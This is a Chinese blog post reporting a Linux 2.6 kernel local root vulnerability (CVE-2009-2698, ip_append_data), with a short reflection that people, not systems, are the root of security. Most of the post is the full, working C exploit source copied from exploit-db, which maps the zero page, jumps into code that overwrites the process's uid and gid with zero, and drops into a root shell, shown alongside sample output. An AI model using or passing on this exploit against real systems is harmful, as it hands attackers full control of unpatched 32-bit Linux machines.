Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit

linux 又爆一本地提权的漏洞,据之前的本地提权的漏洞时间很短啊···昨天还和朋友说起过,到底是 windows 安全还是 linux 安全?你说windows 不安全,Microsoft 用到现在也没啥大的问题,你说 Linux 安全,但又经常被一下子就到 root 了··所以说没有不安全的系统,只有不安全的人,最重要的还是用这操作系统的人,人才是安全的根本....

附一个来自包子 Blog 的利用截图




另附 EXP :

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
  unsigned *addr=task;
  while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
    addr++;
  }
  addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
  addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
  return;
}
void exploit();
void kernel_code()
{
  asm("exploit:\n"
    "push %eax\n"
    "movl $0xfffff000,%eax\n"
    "andl %esp,%eax\n"
    "pushl (%eax)\n"
    "call get_root_uid\n"
    "addl $4,%esp\n"
    "popl %eax\n");
  return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
  int fd=0;
  char buf[1024];
  struct sockaddr x0x;
  void *zero_page;

  uid=getuid();
  gid=getgid();
  if(uid==0){
    fprintf(stderr,"[-] check ur uid\n");
    return -1;
  }
  if(personality(0xffffffff)==PER_SVR4){
    if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
      perror("[-] mprotect()");
      return -1;
    }
  }
  else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
      perror("[-] mmap()");
      return -1;
  }
  *(unsigned long *)0x0=0x90909090;
  *(char *)0x00000004=0x90; /* +1 */
  *(char *)0x00000005=0xff;
  *(char *)0x00000006=0x25;
  *(unsigned long *)0x00000007=(unsigned long)&kernel;
  *(char *)0x0000000b=0xc3;

  if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
    perror("[-] socket()");
    return -1;
  }
  x0x.sa_family=AF_UNSPEC;
  memset(x0x.sa_data,0x82,14);
  memset((char *)buf,0,sizeof(buf));
  sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
  sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
  if(getuid()==uid){
    printf("[-] exploit failed, try again\n");
    return -1;
  }
  close(fd);
  execl("/bin/sh","sh","-i",NULL);
  return 0;
}

/* eoc */

 

 

 

via.http://www.exploit-db.com/exploits/9542/

 

相关http://www.15897.com/blog/post/Linux-Kernel-2.x-sock_sendpage-Local-Root-Exploit.html 

 

http://baoz.net/linux-localroot-no-patch-again/

 

 

http://bbs.chinaunix.net/redirect.php?goto=findpost&ptid=1960669&pid=14038426

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值